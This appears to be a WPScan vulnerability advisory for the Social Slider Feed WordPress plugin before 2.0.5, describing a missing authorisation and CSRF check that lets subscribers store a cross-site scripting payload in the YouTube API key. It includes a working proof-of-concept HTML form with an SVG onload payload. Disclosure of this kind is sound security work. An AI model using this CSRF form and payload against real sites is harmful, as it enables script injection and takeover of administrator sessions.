WordPress Plugin Vulnerabilities

Social Slider Feed < 2.0.5 - Subscriber+ Arbitrary API Key Update to Stored XSS

Description

The plugin does not have authorisation and CSRF check in place when saving the YouTube API Key, and does not sanitise as well as escape it. As a result, users with a role as low as subscriber could change it, including setting it with Stored Cross-Site Scripting payloads in it

Proof of Concept

As any authenticated user, such as subscriber. Or via CSRF against them

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=settings-wisw" method="POST">
      <input type="hidden" name="wyt_api_key" value='a"><svg/onload=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Despite the "Sorry, you are not allowed to access this page." error, the API Key will be updated

The XSS will be triggered when viewing the Profile Dashboard (wp-admin/admin.php?page=settings-wisw)

Affects Plugins

Plugin icon
instagram-slider-widget
Fixed in 2.0.5

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.0 (high)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
9f83daca-7bfd-4a05-9016-defc7f81b4f1

Timeline

Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-08-01 (about 1 years ago)
Last Updated
2022-08-01 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
eShop - wp-admin/admin.php Multiple Parameter XSS
Published
2020-02-21
Title
Chained Quiz < 1.1.9.1 - Authenticated Stored XSS
Published
2015-03-09
Title
Custom Community < 2.0.25 - Stored Cross-Site Scripting (XSS)
Published
2019-12-31
Title
Donorbox 7.1~7.1.1 - Stored Cross-Site Scripting via Shortcode
Published
2023-11-16
Title
Quick Call Button <= 1.2.9 - Authenticated (Administrator+) Stored Cross-Site Scripting via settings